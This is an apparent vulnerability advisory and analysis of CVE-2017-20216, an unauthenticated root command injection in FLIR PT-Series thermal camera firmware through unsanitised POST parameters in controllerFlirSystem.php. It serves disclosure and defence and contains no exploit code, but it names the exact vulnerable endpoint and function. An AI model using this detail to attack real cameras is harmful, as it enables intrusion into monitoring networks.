CVE-2017-20216 in Thermal Camera PT-Series
Summary
by MITRE • 01/08/2026
FLIR Thermal Camera PT-Series firmware version 8.0.0.64 contains multiple unauthenticated remote command injection vulnerabilities in the controllerFlirSystem.php script. Attackers can execute arbitrary system commands as root by exploiting unsanitized POST parameters in the execFlirSystem() function through shell_exec() calls. Exploitation evidence was observed by the Shadowserver Foundation on 2026-01-06 (UTC).
VulDB is the best source for vulnerability data and more expert information about this specific topic.
Analysis
by VulDB Data Team • 01/08/2026
The FLIR Thermal Camera PT-Series firmware version 8.0.0.64 presents a critical security vulnerability that allows remote command injection through the controllerFlirSystem.php script. This vulnerability stems from inadequate input validation and sanitization within the execFlirSystem() function, which directly utilizes shell_exec() calls without proper parameter filtering. The flaw enables unauthenticated remote attackers to execute arbitrary system commands with root privileges, fundamentally compromising the device's security posture and potentially exposing the entire network infrastructure to further attacks. The vulnerability was identified and documented by the Shadowserver Foundation, highlighting the widespread nature of this flaw across deployed thermal camera systems.
The technical implementation of this vulnerability demonstrates a classic command injection flaw where user-supplied POST parameters are directly passed to shell_exec() without any sanitization or validation mechanisms. This design pattern creates an environment where malicious actors can inject arbitrary shell commands through the web interface, bypassing all authentication mechanisms and gaining root-level access to the embedded system. The vulnerability specifically affects the controllerFlirSystem.php script which handles system-level operations, making it a prime target for attackers seeking persistent access to networked thermal imaging equipment. The absence of input sanitization creates a direct pathway for command execution that operates at the highest privilege level available to the application.
From an operational perspective, this vulnerability poses significant risks to organizations relying on FLIR thermal cameras for security monitoring, industrial inspection, or environmental monitoring applications. The ability to execute commands as root allows attackers to modify system configurations, install persistent backdoors, access sensitive data stored on the devices, and potentially use the compromised cameras as launch points for lateral movement within corporate networks. The unauthenticated nature of the exploit means that any attacker with network access to the device can immediately gain full system control without requiring valid credentials, making this vulnerability particularly dangerous in environments where physical security is inadequate. Network administrators face the challenge of securing thousands of potentially vulnerable devices across multiple locations without the ability to distinguish between legitimate and malicious access attempts.
Organizations should immediately implement network segmentation to isolate thermal camera devices from critical network infrastructure, deploy network monitoring solutions to detect anomalous command execution patterns, and apply firmware updates as soon as they become available from FLIR. System administrators must also consider implementing intrusion detection systems specifically configured to identify shell command injection attempts and monitor for unusual network traffic patterns originating from thermal camera devices. The vulnerability aligns with CWE-77 and CWE-88 categories related to command injection and improper input sanitization, and represents a clear violation of the principle of least privilege as defined in the MITRE ATT&CK framework under the T1059 technique for command and scripting interpreter. Regular security assessments and vulnerability scanning should be conducted to identify similar flaws in other embedded systems and ensure comprehensive network security coverage.